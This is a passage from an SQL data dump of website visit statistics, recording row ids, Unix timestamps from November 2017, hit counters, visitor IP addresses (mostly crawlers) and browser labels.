,'other'),(176272,1510343838,7,7,0,0,'46.229.168.80','other'),(176273,1510343859,4,4,0,0,'46.229.168.66','other'),(176274,1510343862,1,1,0,0,'8.29.198.26','other'),(176275,1510343926,4,4,0,0,'46.229.168.79','other'),(176276,1510344053,1,1,0,0,'46.229.168.69','other'),(176277,1510344097,3,3,0,0,'46.229.168.65','other'),(176278,1510344100,1,1,0,0,'51.255.65.43','other'),(176279,1510344153,4,4,0,0,'46.229.168.71','other'),(176280,1510344182,4,4,0,0,'46.229.168.76','other'),(176281,1510344246,4,4,0,0,'46.229.168.75','other'),(176282,1510344321,1,1,0,0,'217.182.132.58','other'),(176283,1510344323,1,0,1,0,'66.249.76.93',''),(176284,1510344570,3,3,0,0,'46.229.168.72','other'),(176285,1510344693,2,2,0,0,'46.229.168.77','other'),(176286,1510344773,6,6,0,0,'46.229.168.73','other'),(176287,1510344784,6,6,0,0,'46.229.168.80','other'),(176288,1510344885,3,3,0,0,'46.229.168.68','other'),(176289,1510344907,2,2,0,0,'46.229.168.70','other'),(176290,1510344944,1,1,0,0,'51.255.65.11','other'),(176291,1510344959,1,1,0,0,'217.182.132.23','other'),(176292,1510345075,4,4,0,0,'46.229.168.69','other'),(176293,1510345129,2,2,0,0,'46.229.168.74','other'),(176294,1510345206,5,5,0,0,'46.229.168.66','other'),(176295,1510345307,1,0,1,0,'66.249.76.107',''),(176296,1510345329,5,5,0,0,'46.229.168.67','other'),(176297,1510345397,4,4,0,0,'46.229.168.71','other'),(176298,1510345505,6,6,0,0,'46.229.168.76','other'),(176299,1510345569,3,3,0,0,'46.229.168.79','other'),(176300,1510345590,7,7,0,0,'46.229.168.65','other'),(176301,1510345701,3,3,0,0,'46.229.168.80','other'),(176302,1510345833,6,6,0,0,'46.229.168.72','other'),(176303,1510345901,3,3,0,0,'46.229.168.70','other'),(176304,1510346033,5,5,0,0,'46.229.168.69','other'),(176305,1510346042,6,6,0,0,'46.229.168.75','other'),(176306,1510346058,1,1,0,0,'164.132.162.187','other'),(176307,1510346156,2,2,0,0,'46.229.168.66','other'),(176308,1510346259,10,10,0,0,'46.229.168.78','other'),(176309,1510346337,7,7,0,0,'46.229.168.67','other'),(176310,1510346413,1,1,0,0,'46.229.168.76','other'),(176311,1510346441,1,1,0,0,'46.229.168.77','other'),(176312,1510346522,5,5,0,0,'46.229.168.71','other'),(176313,1510346778,1,1,0,0,'137.74.207.119','other'),(176314,1510346786,3,3,0,0,'46.229.168.79','other'),(176315,1510346806,1,1,0,0,'216.244.66.246','other'),(176316,1510346823,1,1,0,0,'46.229.168.73','other'),(176317,1510346881,3,3,0,0,'46.229.168.65','other'),(176318,1510346882,3,3,0,0,'46.229.168.68','other'),(176319,1510346944,8,8,0,0,'46.229.168.72','other'),(176320,1510347004,1,1,0,0,'51.255.71.130','other'),(176321,1510347097,3,3,0,0,'46.229.168.70','other'),(176322,1510347150,7,7,0,0,'46.229.168.75','other'),(176323,1510347173,10,10,0,0,'46.229.168.80','other'),(176324,1510347248,1,1,0,0,'217.182.132.171','other'),(176325,1510347350,8,8,0,0,'46.229.168.77','other'),(176326,1510347528,1,1,0,0,'88.198.54.49','other'),(176327,1510347591,4,4,0,0,'46.229.168.71','other'),(176328,1510347655,4,4,0,0,'46.229.168.76','other'),(176329,1510347684,7,7,0,0,'46.229.168.66','other'),(176330,1510347837,7,7,0,0,'46.229.168.78','other'),(176331,1510347900,1,1,0,0,'46.229.168.68','other'),(176332,1510348072,8,8,0,0,'46.229.168.75','other'),(176333,1510348253,3,3,0,0,'46.229.168.67','other'),(176334,1510348299,1,1,0,0,'51.255.71.127','other'),(176335,1510348307,4,4,0,0,'46.229.168.69','other'),(176336,1510348340,1,1,0,0,'51.255.65.87','other'),(176337,1510348380,1,0,1,0,'66.249.76.108',''),(176338,1510348472,2,2,0,0,'46.229.168.80','other'),(176339,1510348493,2,2,0,0,'46.229.168.65','other'),(176340,1510348532,4,4,0,0,'46.229.168.72','other'),(176341,1510348595,1,1,0,0,'46.229.168.71','other'),(176342,1510348624,1,1,0,0,'46.229.168.74','other'),(176343,1510348642,1,1,0,0,'217.182.132.31','other'),(176344,1510348720,1,1,0,0,'46.229.168.73','other'),(176345,1510348806,2,2,0,0,'46.229.168.70','other'),(176346,1510348927,1,1,0,0,'91.196.178.100','chrome'),(176347,1510349051,1,0,1,0,'66.249.65.98',''),(176348,1510349262,1,1,0,0,'217.182.132.79','other'),(176349,1510350035,1,1,0,0,'54.165.59.7','other'),(176350,1510350049,1,1,0,0,'217.182.132.54','other'),(176351,1510350301,1,1,0,0,'35.184.189.105','other'),(176352,1510351008,1,1,0,0,'51.255.65.224','other'),(176353,1510351398,1,1,0,0,'51.255.65.23','other'),(176354,1510351409,1,1,0,0,'217.182.132.63','other'),(176355,1510352449,1,1,0,0,'66.249.76.109','chrome'),(176356,1510352609,1,0,1,0,'66.249.76.108',''),(176357,1510353265,3,3,0,0,'216.244.66.246','other'),(176358,1510353458,1,1,0,0,'37.204.73.56','firefox'),(176359,1510353557,1,0,1,0,'66.249.76.91',''),(176360,1510353633,1,1,0,0,'157.55.39.37','other'),(176361,1510354293,1,1,0,0,'217.182.132.152','other'),(176362,1510354695,1,1,0,0,'8.29.198.25','other'),(176363,1510354882,1,1,0,0,'37.9.113.182','other'),(176364,1510354908,1,1,0,0,'91.210.145.136','chrome'),(176365,1510354910,1,0,1,0,'66.249.76.107',''),(176366,1510355072,1,1,0,0,'164.132.162.159','other'),(176367,1510355245,1,1,0,0,'137.74.207.161','other'),(176368,1510355504,1,1,0,0,'66.249.76.89','chrome'),(176369,1510355534,1,1,0,0,'51.255.65.71','other'),(176370,1510356510,1,1,0,0,'108.59.8.70','other'),(176371,1510356867,1,1,0,0,'217.182.132.172','other'),(176372,1510356905,1,1,0,0,'207.46.13.100','other'),(176373,1510358617,1,1,0,0,'137.74.207.119','other'),(176374,1510359232,1,1,0,0,'180.76.15.145','other'),(176375,1510359351,1,1,0,0,'217.182.132.64','other'),(176376,1510359435,1,1,0,0,'178.154.171.4','other'),(176377,1510359457,1,1,0,0,'66.249.76.108','chrome'),(176378,1510359551,2,2,0,0,'35.184.189.105','other'),(176379,1510360175,1,1,0,0,'51.255.65.83','other'),(176380,1510360783,1,1,0,0,'51.255.65.25','other'),(176381,1510361158,1,0,1,0,'66.249.76.108',''),(176382,1510361447,1,1,0,0,'51.255.65.20','other'),(176383,1510361576,1,1,0,0,'217.182.132.31','other'),(176384,1510361961,1,1,0,0,'217.182.132.7','other'),(176385,1510362270,1,1,0,0,'51.255.65.17','other'),(176386,1510362285,1,1,0,0,'66.249.66.76','chrome'),(176387,1510362381,1,0,1,0,'66.249.76.108',''),(176388,1510362575,1,1,0,0,'66.249.76.107','chrome'),(176389,1510362827,1,0,1,0,'66.249.66.157',''),(176390,1510362900,1,1,0,0,'217.182.132.173','other'),(176391,1510363934,1,1,0,0,'164.132.162.154','other'),(176392,1510364053,1,1,0,0,'51.255.65.80','other'),(176393,1510365149,1,1,0,0,'51.255.65.12','other'),(176394,1510365271,1,1,0,0,'51.255.65.74','other'),(176395,1510365522,1,1,0,0,'8.29.198.26','other'),(176396,1510367003,1,1,0,0,'217.182.132.17','other'),(176397,1510367246,1,1,0,0,'217.182.132.19','other'),(176398,1510368486,1,1,0,0,'51.255.71.130','other'),(176399,1510368557,1,1,0,0,'51.255.71.131','other'),(176400,1510368573,1,1,0,0,'66.249.76.108','chrome'),(176401,1510368910,1,1,0,0,'37.9.113.74','other'),(176402,1510369132,1,1,0,0,'66.249.66.155','chrome'),(176403,1510369136,1,1,0,0,'217.182.132.92','other'),(176404,1510369148,1,1,0,0,'217.182.132.31','other'),(176405,1510369221,1,1,0,0,'35.184.189.105','other'),(176406,1510369467,1,1,0,0,'165.227.101.197','other'),(176407,1510369767,1,1,0,0,'216.244.66.237','other'),(176408,1510370130,1,1,0,0,'37.9.113.56','other'),(176409,1510370364,28,28,0,0,'208.110.93.52','other'),(176410,1510371455,1,1,0,0,'51.255.65.28','other'),(176411,1510371595,1,1,0,0,'216.244.66.194','other'),(176412,1510372278,1,1,0,0,'217.182.132.192','other'),(176413,1510372390,1,1,0,0,'51.255.65.39','other'),(176414,1510372622,1,1,0,0,'51.255.71.120','other'),(176415,1510372834,1,1,0,0,'217.182.132.63','other'),(176416,1510372848,1,1,0,0,'51.255.65.24','other'),(176417,1510373258,1,0,1,0,'66.249.66.74',''),(176418,1510373471,1,1,0,0,'66.249.76.109','chrome'),(176419,1510373495,1,1,0,0,'207.46.13.100','other'),(176420,1510373907,1,1,0,0,'51.255.65.86','other'),(176421,1510374022,1,1,0,0,'176.31.231.10','other'),(176422,1510374080,1,1,0,0,'141.8.132.19','other'),(176423,1510374428,1,1,0,0,'82.193.102.149','other'),(176424,1510374500,1,1,0,0,'217.182.132.55','other'),(176425,1510374618,1,1,0,0,'217.182.132.54','other'),(176426,1510374642,1,1,0,0,'37.9.113.56','other'),(176427,1510374747,1,1,0,0,'37.9.113.80','other'),(176428,1510375179,1,1,0,0,'51.255.65.79','other'),(176429,1510376357,1,1,0,0,'8.29.198.25','other'),(176430,1510376805,1,1,0,0,'66.249.76.109','chrome'),(176431,1510376880,1,1,0,0,'216.244.66.194','other'),(176432,1510377091,1,1,0,0,'137.74.207.188','other'),(176433,1510377092,2,2,0,0,'157.55.39.63','other'),(176434,1510377122,1,1,0,0,'51.255.65.30','other'),(176435,1510377386,1,1,0,0,'217.182.132.184','other'),(176436,1510378253,1,1,0,0,'51.255.65.71','other'),(176437,1510378263,1,1,0,0,'216.244.66.246','other'),(176438,1510378888,1,1,0,0,'66.249.76.109','chrome'),(176439,1510378991,1,1,0,0,'217.182.132.152','other'),(176440,1510379208,1,1,0,0,'95.220.92.89','chrome'),(176441,1510379325,1,1,0,0,'51.255.65.36','other'),(176442,1510380001,1,1,0,0,'137.74.207.110','other'),(176443,1510380188,1,1,0,0,'62.149.15.172','chrome'),(176444,1510380657,1,1,0,0,'178.154.171.55','other'),(176445,1510380876,1,1,0,0,'217.182.132.149','other'),(176446,1510381621,1,1,0,0,'217.182.132.151','other'),(176447,1510381637,1,1,0,0,'207.46.13.100','other'),(176448,1510382095,1,1,0,0,'141.8.142.29','other'),(176449,1510382183,1,1,0,0,'164.132.162.154','other'),(176450,1510382245,1,1,0,0,'5.255.253.35','other'),(176451,1510383034,1,1,0,0,'66.249.66.155','chrome'),(176452,1510383132,1,1,0,0,'217.182.132.240','other'),(176453,1510383908,1,1,0,0,'217.182.132.50','other'),(176454,1510384116,2,2,0,0,'216.244.66.246','other'),(176455,1510384296,1,1,0,0,'217.182.132.82','other'),(176456,1510384596,1,1,0,0,'46.101.159.215','other'),(176457,1510384744,1,1,0,0,'217.182.132.97','other'),(176458,1510386110,1,1,0,0,'178.154.171.88','other'),(176459,1510386215,1,1,0,0,'66.249.76.109','chrome'),(176460,1510386224,1,1,0,0,'66.249.76.107','chrome'),(176461,1510386811,1,1,0,0,'51.255.65.224','other'),(176462,1510386870,1,1,0,0,'51.255.65.81','other'),(176463,1510387197,1,1,0,0,'8.29.198.26','other'),(176464,1510387445,1,1,0,0,'94.179.6.171','chrome'),(176465,1510387644,1,1,0,0,'217.182.132.28','other'),(176466,1510387666,1,1,0,0,'137.74.207.170','other'),(176467,1510387738,1,1,0,0,'217.182.132.172','other'),(176468,1510387978,1,1,0,0,'141.8.142.74','other'),(176469,1510388314,1,1,0,0,'217.182.132.190','other'),(176470,1510388514,1,1,0,0,'51.255.65.64','other'),(176471,1510388651,1,1,0,0,'51.255.65.41','other'),(176472,1510388856,1,1,0,0,'164.132.162.188','other'),(176473,1510389509,1,1,0,0,'141.8.142.74','other'),(176474,1510389578,1,1,0,0,'66.249.76.109','chrome'),(176475,1510391116,1,1,0,0,'141.8.142.74','other'),(176476,1510391276,1,1,0,0,'66.249.66.155','chrome'),(176477,1510391572,2,2,0,0,'216.244.66.237','other'),(176478,1510392036,1,1,0,0,'35.184.189.105','other'),(176479,1510392338,8,0,8,0,'66.249.76.107',''),(176480,1510392379,6,0,6,0,'66.249.66.155',''),(176482,1510392409,4,1,3,0,'66.249.76.107',''),(176483,1510392434,3,0,3,0,'66.249.76.109',''),(176484,1510392443,1,1,0,0,'51.255.64.106','other'),(176485,1510392446,1,0,1,0,'66.249.66.158',''),(176486,1510392448,3,0,3,0,'66.249.76.108',''),(176487,1510392450,1,0,1,0,'66.249.76.110',''),(176488,1510392459,1,0,1,0,'66.249.66.156',''),(176489,1510392485,1,0,1,0,'66.249.66.157',''),(176490,1510392752,1,1,0,0,'217.182.132.87','other'),(176491,1510392950,1,1,0,0,'35.184.189.105','other'),(176492,1510393400,1,1,0,0,'217.182.132.95','other'),(176493,1510393422,1,1,0,0,'178.154.171.88','other'),(176494,1510394066,1,1,0,0,'51.255.65.48','other'),(176495,1510394556,1,1,0,0,'217.182.132.72','other'),(176496,1510394559,2,2,0,0,'141.8.142.74','other'),(176497,1510394568,1,1,0,0,'66.249.76.107','chrome'),(176498,1510394775,1,1,0,0,'51.255.65.40','other'),(176499,1510394933,1,1,0,0,'66.249.76.108','chrome'),(176500,1510394964,1,1,0,0,'164.132.162.160','other'),(176501,1510395145,1,1,0,0,'51.255.65.224','other'),(176502,1510395305,2,2,0,0,'66.249.66.155','chrome'),(176503,1510395771,1,1,0,0,'217.182.132.93','other'),(176504,1510395980,1,1,0,0,'217.182.132.80','other'),(176505,1510396752,1,1,0,0,'217.182.132.181','other'),(176506,1510396860,2,2,0,0,'216.244.66.194','other'),(176507,1510397027,1,1,0,0,'66.249.76.108','chrome'),(176508,1510397241,1,0,1,0,'66.249.76.93',''),(176509,1510397312,1,1,0,0,'66.249.66.157','chrome'),(176510,1510397434,1,1,0,0,'178.154.171.88','other'),(176511,1510398045,1,1,0,0,'8.29.198.26','other'),(176512,1510398168,1,1,0,0,'217.182.132.95','other'),(176513,1510398849,1,1,0,0,'51.255.65.92','other'),(176514,1510398897,1,0,1,0,'66.249.76.109',''),(176515,1510398912,1,1,0,0,'51.255.65.7','other'),(176516,1510399149,1,1,0,0,'217.182.132.93','other'),(176517,1510399150,1,1,0,0,'217.182.132.72','other'),(176518,1510399352,1,1,0,0,'37.9.113.182','other'),(176519,1510399526,1,1,0,0,'51.255.65.10','other'),(176520,1510399596,1,1,0,0,'51.255.71.129','other'),(176521,1510399703,1,1,0,0,'195.154.204.94','chrome'),(176522,1510399988,1,1,0,0,'217.182.132.153','other'),(176523,1510400889,1,1,0,0,'87.250.224.46','other'),(176524,1510400909,113,113,0,0,'62.210.101.104','other'),(176525,1510401141,1,1,0,0,'91.196.178.162','chrome'),(176526,1510401490,1,1,0,0,'51.255.65.14','other'),(176527,1510401811,58,58,0,0,'62.210.101.104','other'),(176528,1510401930,1,1,0,0,'137.74.207.101','other'),(176529,1510402262,1,1,0,0,'66.249.76.109','chrome'),(176530,1510402999,1,1,0,0,'87.250.224.46','other'),(176531,1510403198,1,1,0,0,'217.182.132.30','other'),(176532,1510403525,1,1,0,0,'137.74.207.170','other'),(176533,1510404101,1,1,0,0,'216.244.66.237','other'),(176534,1510404426,1,1,0,0,'217.182.132.70','other'),(176535,1510405303,1,1,0,0,'51.255.71.117','other'),(176536,1510405854,1,1,0,0,'51.255.65.71','other'),(176537,1510406613,1,1,0,0,'51.255.65.62','other'),(176538,1510406971,1,1,0,0,'37.55.57.49','chrome'),(176539,1510407134,1,1,0,0,'51.255.71.121','other'),(176540,1510407269,1,1,0,0,'217.182.132.177','other'),(176541,1510407993,1,1,0,0,'178.154.171.81','other'),(176542,1510408181,1,0,1,0,'66.249.66.156',''),(176543,1510408668,1,1,0,0,'217.182.132.55','other'),(176544,1510408883,1,1,0,0,'8.29.198.26','other'),(176545,1510408984,1,1,0,0,'217.182.132.24','other'),(176546,1510409269,1,1,0,0,'51.255.65.21','other'),(176547,1510409296,1,1,0,0,'217.182.132.82','other'),(176548,1510409410,1,1,0,0,'35.184.189.105','other'),(176549,1510409414,1,1,0,0,'51.255.71.117','other'),(176550,1510410097,1,1,0,0,'51.255.71.129','other'),(176551,1510410699,1,1,0,0,'217.182.132.7','other'),(176552,1510410794,1,1,0,0,'51.255.65.19','other'),(176553,1510410968,1,1,0,0,'217.182.132.177','other'),(176554,1510411399,1,1,0,0,'217.182.132.71','other'),(176555,1510411443,2,2,0,0,'141.8.142.74','other'),(176556,1510411773,1,1,0,0,'217.182.132.37','other'),(176557,1510411813,1,1,0,0,'217.182.132.90','other'),(176558,1510411853,1,1,0,0,'207.46.13.100','other'),(176559,1510411889,1,1,0,0,'216.244.66.237','other'),(176560,1510412225,1,1,0,0,'151.80.27.116','other'),(176561,1510412435,1,1,0,0,'79.110.131.180','chrome'),(176562,1510412626,1,1,0,0,'195.154.204.94','chrome'),(176563,1510413002,1,1,0,0,'217.182.132.84','other'),(176564,1510413945,1,1,0,0,'51.255.71.111','other'),(176565,1510414035,1,1,0,0,'178.95.156.151','chrome'),(176566,1510414958,1,0,1,0,'66.249.76.89',''),(176567,1510416492,1,1,0,0,'51.255.65.10','other'),(176568,1510416654,1,1,0,0,'51.255.71.122','other'),(176569,1510418559,1,1,0,0,'51.255.65.33','other'),(176570,1510418866,1,1,0,0,'51.255.65.8','other'),(176571,1510418963,1,0,1,0,'66.249.66.74',''),(176572,1510419308,1,0,1,0,'66.249.66.76',''),(176573,1510419424,1,1,0,0,'137.74.207.161','other'),(176574,1510419722,1,1,0,0,'8.29.198.27','other'),(176575,1510419871,1,1,0,0,'109.122.33.224','chrome'),(176576,1510420444,15,15,0,0,'94.154.239.69','other'),(176577,1510420461,1,1,0,0,'51.255.65.22','other'),(176578,1510420787,1,1,0,0,'217.182.132.97','other'),(176579,1510420852,1,1,0,0,'51.255.65.61','other'),(176580,1510421425,1,1,0,0,'217.182.132.185','other'),(176581,1510421447,1,1,0,0,'217.182.132.148','other'),(176582,1510421739,1,1,0,0,'51.255.71.127','other'),(176583,1510422423,1,1,0,0,'151.80.27.118','other'),(176584,1510422517,1,1,0,0,'46.101.159.215','other'),(176585,1510422736,1,1,0,0,'51.255.65.21','other'),(176586,1510422874,1,1,0,0,'66.249.66.156','chrome'),(176587,1510422876,1,1,0,0,'51.255.65.82','other'),(176588,1510423387,1,1,0,0,'35.184.189.105','other'),(176589,1510423556,1,1,0,0,'51.255.65.83','other'),(176590,1510424474,15,15,0,0,'94.154.239.69','other'),(176591,1510424881,1,1,0,0,'216.244.66.246','other'),(176592,1510424967,1,1,0,0,'46.211.97.124','chrome'),(176593,1510425083,1,1,0,0,'46.42.162.148','msie'),(176594,1510425818,1,1,0,0,'91.196.178.70','chrome'),(176595,1510426179,1,1,0,0,'157.55.39.194','other'),(176596,1510426231,1,1,0,0,'66.249.66.74','chrome'),(176597,1510426243,1,1,0,0,'217.182.132.184','other'),(176598,1510427128,1,1,0,0,'216.244.66.237','other'),(176599,1510427131,1,1,0,0,'217.182.132.148','other'),(176600,1510427368,1,1,0,0,'217.182.132.79','other'),(176601,1510427403,1,1,0,0,'51.255.71.101','other'),(176602,1510427430,1,1,0,0,'162.210.196.130','other'),(176603,1510427440,1,1,0,0,'91.196.178.40','chrome'),(176604,1510427508,1,1,0,0,'137.74.207.170','other'),(176605,1510427684,1,0,1,0,'66.249.66.155',''),(176606,1510427802,1,1,0,0,'51.255.71.112','other'),(176607,1510427905,1,1,0,0,'141.8.142.74','other'),(176608,1510427997,1,1,0,0,'40.77.167.4','other'),(176609,1510428202,1,1,0,0,'164.132.162.157','other'),(176610,1510428355,1,1,0,0,'51.255.71.126','other'),(176611,1510428891,1,1,0,0,'137.74.203.194','other'),(176612,1510429159,1,0,1,0,'66.249.76.91',''),(176613,1510429363,1,1,0,0,'198.204.243.138','other'),(176614,1510429559,1,1,0,0,'217.182.132.185','other'),(176615,1510429633,1,1,0,0,'51.255.65.59','other'),(176616,1510429732,1,1,0,0,'216.244.66.246','other'),(176617,1510429969,1,1,0,0,'51.255.65.56','other'),(176618,1510430556,1,1,0,0,'8.29.198.27','other'),(176619,1510430824,1,1,0,0,'217.182.132.170','other'),(176620,1510431545,2,2,0,0,'141.8.142.74','other'),(176621,1510431668,1,0,1,0,'66.249.76.91',''),(176622,1510431908,1,1,0,0,'157.55.39.194','other'),(176623,1510431930,1,1,0,0,'66.249.76.108','chrome'),(176624,1510432248,1,1,0,0,'217.182.132.7','other'),(176625,1510432479,1,1,0,0,'217.182.132.60','other'),(176626,1510432668,1,1,0,0,'137.74.203.194','other'),(176627,1510433325,1,1,0,0,'62.210.201.88','chrome'),(176628,1510433493,1,1,0,0,'207.46.13.160','other'),(176629,1510433495,1,1,0,0,'66.102.9.29','chrome'),(176630,1510433539,1,1,0,0,'66.102.9.25','chrome'),(176631,1510433560,1,1,0,0,'66.102.9.27','chrome'),(176632,1510434063,1,1,0,0,'51.255.65.43','other'),(176633,1510434377,1,0,1,0,'66.249.76.91',''),(176634,1510434580,1,1,0,0,'217.182.132.33','other'),(176635,1510435759,1,1,0,0,'51.255.65.52','other'),(176636,1510436963,1,1,0,0,'137.74.207.170','other'),(176637,1510437138,1,1,0,0,'66.249.66.156','chrome'),(176638,1510437302,1,1,0,0,'217.182.132.66','other'),(176639,1510437618,1,1,0,0,'51.255.64.106','other'),(176640,1510437688,1,1,0,0,'216.244.66.237','other'),(176641,1510438259,2,2,0,0,'35.184.189.105','other'),(176642,1510438935,1,1,0,0,'207.46.13.100','other'),(176643,1510439078,1,1,0,0,'51.255.65.16','other'),(176644,1510439098,1,1,0,0,'216.244.66.194','other'),(176645,1510439110,1,1,0,0,'157.55.39.194','other'),(176646,1510439624,1,1,0,0,'141.8.142.50','other'),(176647,1510440108,1,1,0,0,'51.255.65.48','other'),(176648,1510440227,1,1,0,0,'217.182.132.78','other'),(176649,1510440900,1,1,0,0,'217.182.132.94','other'),(176650,1510441396,1,1,0,0,'8.29.198.27','other'),(176651,1510441568,1,1,0,0,'81.1.242.33','other'),(176652,1510441974,1,1,0,0,'217.182.132.36','other'),(176653,1510442767,1,1,0,0,'157.55.39.194','other'),(176654,1510443014,1,1,0,0,'217.182.132.188','other'),(176655,1510443308,1,1,0,0,'217.69.133.223','other'),(176656,1510443624,1,0,1,0,'66.249.76.89',''),(176657,1510443725,1,1,0,0,'216.244.66.246','other'),(176658,1510443927,1,1,0,0,'217.182.132.157','other'),(176659,1510443946,1,1,0,0,'54.165.59.7','other'),(176660,1510444046,1,1,0,0,'217.182.132.32','other'),(176661,1510444302,1,1,0,0,'217.182.132.57','other'),(176662,1510445035,1,1,0,0,'51.255.71.116','other'),(176663,1510445371,1,1,0,0,'217.182.132.72','other'),(176664,1510445706,1,1,0,0,'51.255.65.19','other'),(176665,1510445790,1,1,0,0,'217.182.132.52','other'),(176666,1510445857,1,1,0,0,'66.249.66.76','chrome'),(176667,1510446594,1,1,0,0,'51.255.65.16','other'),(176668,1510447563,1,1,0,0,'51.255.71.130','other'),(176669,1510448086,1,1,0,0,'141.8.142.29','other'),(176670,1510448480,1,1,0,0,'217.182.132.16','other'),(176671,1510448882,1,1,0,0,'51.255.71.113','other'),(176672,1510449363,1,1,0,0,'216.244.66.237','other'),(176673,1510449949,1,1,0,0,'164.132.162.156','other'),(176674,1510450049,1,1,0,0,'217.182.132.14','other'),(176675,1510450229,1,1,0,0,'216.244.66.246','other'),(176676,1510450290,1,1,0,0,'217.182.132.93','other'),(176677,1510451361,1,1,0,0,'51.255.65.31','other'),(176678,1510451666,72,72,0,0,'23.237.4.26','other'),(176679,1510452236,1,1,0,0,'8.29.198.27','other'),(176680,1510453085,1,1,0,0,'217.182.132.54','other'),(176681,1510453154,1,1,0,0,'157.55.39.37','other'),(176682,1510453487,1,0,1,0,'66.249.76.107',''),(176683,1510453554,1,1,0,0,'217.182.132.20','other'),(176684,1510453692,1,1,0,0,'217.69.133.252','other'),(176685,1510453694,1,1,0,0,'217.182.132.30','other'),(176686,1510455033,1,0,1,0,'66.249.66.75',''),(176687,1510455051,1,1,0,0,'51.255.65.42','other'),(176688,1510455179,2,2,0,0,'144.76.38.40','other'),(176689,1510455837,1,1,0,0,'51.255.65.85','other'),(176690,1510457100,2,2,0,0,'141.8.142.74','other'),(176691,1510457167,1,1,0,0,'217.182.132.187','other'),(176692,1510457447,1,1,0,0,'216.244.66.246','other'),(176693,1510457468,1,1,0,0,'51.255.71.125','other'),(176694,1510457955,1,1,0,0,'35.184.189.105','other'),(176695,1510459073,1,1,0,0,'51.255.65.49','other'),(176696,1510459232,1,0,1,0,'66.249.76.107',''),(176697,1510459534,1,1,0,0,'66.249.66.156','chrome'),(176698,1510459691,1,1,0,0,'217.182.132.74','other'),(176699,1510459997,1,1,0,0,'51.255.65.7','other'),(176700,1510460250,1,1,0,0,'216.244.66.237','other'),(176701,1510460890,1,1,0,0,'51.255.65.8','other'),(176702,1510461260,1,1,0,0,'141.8.142.74','other'),(176703,1510461792,1,1,0,0,'95.220.114.84','msie'),(176704,1510461794,1,1,0,0,'5.228.129.60','msie'),(176705,1510461895,1,0,1,0,'66.249.66.155',''),(176706,1510461920,1,1,0,0,'217.182.132.179','other'),(176707,1510462165,1,1,0,0,'137.74.207.161','other'),(176708,1510462231,1,1,0,0,'207.46.13.135','other'),(176709,1510462319,1,1,0,0,'217.182.132.69','other'),(176710,1510462392,1,1,0,0,'109.206.177.104','other'),(176711,1510462970,1,1,0,0,'137.74.207.108','other'),(176712,1510462994,1,1,0,0,'209.90.225.243','chrome'),(176713,1510463070,1,1,0,0,'8.29.198.25','other'),(176714,1510463382,1,1,0,0,'137.74.207.188','other'),(176715,1510463477,1,1,0,0,'66.249.76.107','chrome'),(176716,1510463769,1,1,0,0,'66.249.76.89','chrome'),(176717,1510463955,1,1,0,0,'51.255.65.91','other'),(176718,1510464019,1,1,0,0,'51.255.71.120','other'),(176719,1510465402,1,1,0,0,'216.244.66.237','other'),(176720,1510466186,1,1,0,0,'137.74.207.119','other'),(176721,1510467036,1,1,0,0,'91.196.178.165','chrome'),(176722,1510467390,1,1,0,0,'217.182.132.29','other'),(176723,1510467536,1,1,0,0,'216.244.66.194','other'),(176724,1510467538,1,1,0,0,'207.46.13.135','other'),(176725,1510467577,1,1,0,0,'180.76.15.134','other'),(176726,1510467946,1,1,0,0,'216.244.66.237','other'),(176727,1510467954,1,0,1,0,'66.249.76.89',''),(176728,1510467966,1,1,0,0,'66.249.66.156','chrome'),(176729,1510467997,1,1,0,0,'91.196.178.39','chrome'),(176730,1510468755,1,1,0,0,'51.255.65.93','other'),(176731,1510468841,1,1,0,0,'180.76.15.8','other'),(176732,1510469028,1,1,0,0,'62.149.15.172','chrome'),(176733,1510469328,1,1,0,0,'51.255.65.27','other'),(176734,1510469852,1,1,0,0,'51.255.65.45','other'),(176735,1510470130,17,17,0,0,'176.36.80.39','other'),(176736,1510470391,1,1,0,0,'216.244.66.237','other'),(176737,1510470501,1,1,0,0,'217.182.132.62','other'),(176738,1510470598,1,1,0,0,'217.182.132.19','other'),(176739,1510470625,1,1,0,0,'178.154.171.88','other'),(176740,1510471281,1,1,0,0,'217.182.132.94','other'),(176741,1510471641,1,0,1,0,'66.249.66.80',''),(176742,1510472269,1,0,1,0,'66.249.66.74',''),(176743,1510472332,1,1,0,0,'137.74.207.188','other'),(176744,1510472561,1,1,0,0,'91.196.178.69','other'),(176745,1510472655,1,1,0,0,'217.182.132.80','other'),(176746,1510472687,1,1,0,0,'216.244.66.237','other'),(176747,1510472712,1,1,0,0,'51.255.65.69','other'),(176748,1510473000,1,1,0,0,'51.255.65.85','other'),(176749,1510473131,1,1,0,0,'46.161.9.55','chrome'),(176750,1510473138,1,1,0,0,'217.182.132.67','other'),(176751,1510473141,1,1,0,0,'46.161.9.55','firefox'),(176752,1510473307,1,1,0,0,'217.182.132.92','other'),(176753,1510473901,1,1,0,0,'8.29.198.25','other'),(176754,1510474090,1,1,0,0,'51.255.71.100','other'),(176755,1510474718,1,1,0,0,'217.182.132.191','other'),(176756,1510475813,1,1,0,0,'51.255.65.70','other'),(176757,1510476485,1,1,0,0,'217.182.132.17','other'),(176758,1510476507,5,5,0,0,'80.87.198.187','other'),(176759,1510476930,1,1,0,0,'51.255.71.127','other'),(176760,1510477169,1,1,0,0,'51.255.65.12','other'),(176761,1510477944,1,1,0,0,'137.74.207.170','other'),(176762,1510478525,1,1,0,0,'207.46.13.100','other'),(176763,1510479778,1,1,0,0,'217.182.132.58','other'),(176764,1510480215,1,1,0,0,'207.46.13.135','other'),(176765,1510480659,1,1,0,0,'217.182.132.68','other'),(176766,1510480976,1,1,0,0,'51.255.65.54','other'),(176767,1510481533,1,1,0,0,'217.69.133.236','other'),(176768,1510481688,1,1,0,0,'217.182.132.90','other'),(176769,1510481844,1,1,0,0,'164.132.162.155','other'),(176770,1510481865,1,0,1,0,'66.249.76.108',''),(176771,1510481911,1,1,0,0,'37.9.113.182','other'),(176772,1510482016,1,1,0,0,'216.244.66.237','other'),(176773,1510482093,1,1,0,0,'217.182.132.16','other'),(176774,1510482615,1,1,0,0,'51.255.65.35','other'),(176775,1510483290,1,0,1,0,'66.249.64.29',''),(176776,1510483364,1,1,0,0,'37.55.57.49','chrome'),(176777,1510484178,1,1,0,0,'217.182.132.55','other'),(176778,1510484356,1,1,0,0,'51.255.65.21','other'),(176779,1510484369,1,1,0,0,'51.255.71.110','other'),(176780,1510484616,1,1,0,0,'51.255.65.47','other'),(176781,1510484728,1,1,0,0,'8.29.198.26','other'),(176782,1510484835,1,1,0,0,'51.255.71.116','other'),(176783,1510485178,1,1,0,0,'216.244.66.237','other'),(176784,1510485607,1,1,0,0,'141.8.142.74','other'),(176785,1510485799,2,2,0,0,'54.165.59.7','other'),(176786,1510485896,1,1,0,0,'216.244.66.246','other'),(176787,1510486002,1,0